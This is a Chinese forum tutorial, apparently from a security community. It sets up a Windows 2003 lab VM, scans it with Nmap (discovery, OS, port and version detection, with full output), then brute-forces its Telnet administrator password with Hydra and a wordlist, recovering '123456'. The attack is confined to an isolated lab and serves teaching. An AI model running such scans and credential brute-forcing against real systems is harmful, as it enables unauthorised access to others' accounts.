hydra自不必多说,爆破神奇九头蛇,而很多好兄弟不知道怎么在windows上使用hydra,这边我提供一个完美适配windows系统的版本最稳定的hydra——hydra 8.1
打开一台win2003,仅主机模式接到虚拟网卡VMnet1
仅主机模式不能上因特网,是一个封闭的内网环境,且可以随便配IP,只要在同一网段,两台主机就可以通信
打开services.msc,打开服务Telnet——TCP:23
桌面=>右键我的电脑=>属性=>远程=>启用远程桌面——TCP:3389
我的电脑=>光驱=>安装可选的Windows组件=>应用程序服务器=>IIS=>FTP——TCP:21
打开IIS,配置默认的FTP站点。右击属性=>安全账户=>取消匿名访问
新建一个用户,我们将用它做为目标用户
net user test testtest /add
下面我们介绍一个号称“扫描之王”的软件——Nmap,下面是重要常用参数:
参数 | 功能 |
---|---|
-sP | ping扫描 |
-p | 指定端口范围 |
-sV | 服务版本探测 |
-O | 启用操作系统探测 |
-A | 全面扫描 |
-oN | 保存txt |
描扫192.168.241.0/24网段在线主机
C:\Users\Administrator>nmap -sP 192.168.241.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:06 ?D1ú±ê×?ê±??
Stats: 0:00:22 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 255 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
MAC Address: 00:0C:29:E9:24:06 (VMware)
Nmap scan report for 192.168.241.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E0:96:74 (VMware)
Nmap scan report for 192.168.241.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 22.80 seconds
探测192.168.241.128的操作系统等信息
C:\Users\Administrator>nmap -O 192.168.241.128
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:09 ?D1ú±ê×?ê±??
Stats: 0:00:18 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.241.128
Host is up (0.00055s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1048/tcp open neod2
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:E9:24:06 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.75 seconds
探测192.168.241.128的操作系统等信息并保存当D:\baogao.txt
C:\Users\Administrator>nmap -O 192.168.241.128 -oN d:\baogao.txt
探测192.168.241.128指定端口
C:\Users\Administrator>nmap -p 21,23,80 192.168.241.128
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:12 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
PORT STATE SERVICE
21/tcp open ftp
23/tcp open telnet
80/tcp closed http
MAC Address: 00:0C:29:E9:24:06 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.14 seconds
探测192.168.241.128指定端口,同时探测哪个服务版本
C:\Users\Administrator>nmap -p 21,23 192.168.241.128 -sV
Starting Nmap 7.40 ( https://nmap.org ) at 2021-11-08 11:15 ?D1ú±ê×?ê±??
Nmap scan report for 192.168.241.128
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
23/tcp open telnet Microsoft Windows XP telnetd
MAC Address: 00:0C:29:E9:24:06 (VMware)
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.06 seconds
信息扫描完成后,我们便可以开始爆破。
这里我们用到的是hydra九头蛇———8.1版本(比较适合在windows下运行)
参数 | 功能 |
---|---|
-R | 继续从上一次进度接着破解 |
-S | 采用SSL链接 |
-s | 指定非默认端口 |
-l | 指定破解的用户,对特定用户破解 |
-L | 指定用户名字典 |
-p | 指定密码破解 |
-P | 指定密码字典 |
-e | n:空密码试探,s:使用指定用户和密码试探 |
-C | 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数 |
M | 指定目标列表文件一行一条 |
-o | 指定结果输出文件 |
-f | 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解 |
-t | 同时运行的线程数,默认为16 |
-w | 设置最大超时的时间,单位秒,默认是30s |
-v /-V | 显示详细过程 |
爆破协议可以为telnet、rdp、smb(即CIFS445端口共享)、ftp、ssh、mysql。
建议配置环境变量,可以直接调用hydra
在真机里,D盘下创建一个txt,这就是我们的密码字典——pass.txt,内容键入n行密码
然后打开控制台,键入:
hydra -l administrator -P d:\pass.txt 192.168.241.128 telnet
意为 以用户为administrator和pass.txt字典结合对该IP的telnet服务进行暴力破解
破解成功
C:\>hydra -l administrator -P d:\pass.txt 192.168.241.128 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2021-11-08 21:05:03
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 48 login tries (l:1/p:48), ~0 tries per task
[DATA] attacking service telnet on port 23
[23][telnet] host: 192.168.241.128 login: administrator password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2021-11-08 21:05:28
得到密码:login: administrator password: 123456
好兄弟,有帮助记得点赞打赏,有来有往,回复可见附件
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-劲夫 | 25.00 | 0 | 2021-12-27 16:04:10 | 活动奖励 |
Track-劲夫 | 50.00 | 0 | 2021-12-27 16:04:01 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
13258497925
发表于 1个月前
666
评论列表
加载数据中...